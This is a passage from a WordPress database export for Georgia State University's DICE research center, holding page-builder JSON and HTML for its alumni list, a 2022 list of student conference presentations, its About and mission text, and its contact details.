ef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c205\",\"index\":2,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c205\",\"index\":1,\"id\":\"182-c209\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c210\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c212\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c210\",\"index\":2,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c210\",\"index\":1,\"id\":\"182-c214\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c215\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c216\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c217\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c215\",\"index\":2,\"id\":\"182-c218\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c215\",\"index\":1,\"id\":\"182-c219\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c220\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c220\",\"index\":0,\"id\":\"182-c221\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c220\",\"index\":0,\"id\":\"182-c222\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c220\",\"index\":2,\"id\":\"182-c223\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c220\",\"index\":1,\"id\":\"182-c224\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c227\",\"parentId\":\"182-c226\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c226\",\"parentId\":\"182-c225\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c225\",\"parentId\":\"182-c159\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','publish','closed','closed','','562','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=562',0,'extb_post_json','',0),(570,1,'2022-03-17 21:15:02','2022-03-18 01:15:02','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"449-c4\",\"parentId\":\"449-c3\",\"partialId\":449,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"449-c4\",\"index\":0,\"id\":\"449-c5\",\"partialId\":449,\"styleRef\":380,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p>\"}}],\"styleRef\":379,\"type\":\"content\"}],\"id\":\"449-c3\",\"parentId\":\"449-c2\",\"partialId\":449,\"styleRef\":378,\"type\":\"content\"}],\"id\":\"449-c2\",\"parentId\":\"449-c1\",\"partialId\":449,\"styleRef\":377,\"type\":\"content\"}]}','','','inherit','closed','closed','','497-revision-v1','','','2022-03-17 21:15:02','2022-03-18 01:15:02','',497,'https://gsudice.dataconn.net/?p=570',0,'revision','',0),(571,1,'2022-03-17 21:15:02','2022-03-18 01:15:02','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"449-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-377 style-local-449-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"449-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-378 style-local-449-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-379-outer style-local-449-c4-outer\">\n <div data-colibri-id=\"449-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-379 style-local-449-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"449-c5\" class=\"h-text h-text-component style-380 style-local-449-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2022</strong></p>\n <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n American Association of Geographers, Annual Meeting 2022.</p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 21:15:02','2022-03-18 01:15:02','',449,'https://gsudice.dataconn.net/?p=571',0,'revision','',0),(578,1,'2022-03-18 20:38:07','2022-03-19 00:38:07','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c17\",\"index\":0,\"id\":\"122-c18\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c15\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c21\",\"parentId\":\"122-c20\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c20\",\"parentId\":\"122-c19\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c15\",\"index\":0,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c15\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-03-18 20:38:07','2022-03-19 00:38:07','',353,'https://gsudice.dataconn.net/?p=578',0,'revision','',0),(579,1,'2022-03-18 20:38:07','2022-03-19 00:38:07','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c5\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c6\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c13\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c15\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c15 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c16\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c16 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c17-outer\">\n <div data-colibri-id=\"122-c17\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c17 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c18\" class=\"h-global-transition-all h-heading style-324 style-local-122-c18 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c18\">\n <!---->\n <!---->\n <h3 class=\"\">Our Mission</h3>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c19\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c19 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c20-outer\">\n <div data-colibri-id=\"122-c20\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-319 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-03-18 20:38:07','2022-03-19 00:38:07','',122,'https://gsudice.dataconn.net/?p=579',0,'revision','',0),(586,1,'2022-03-18 20:45:31','2022-03-19 00:45:31','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":399,\"type\":\"content\",\"props\":{\"content\":\"DICE\"}},{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c7\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus. <\\/p><p>Phone: (404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c8\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-03-18 20:45:31','2022-03-19 00:45:31','',546,'https://gsudice.dataconn.net/?p=586',0,'revision','',0),(587,1,'2022-03-18 20:45:31','2022-03-19 00:45:31','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 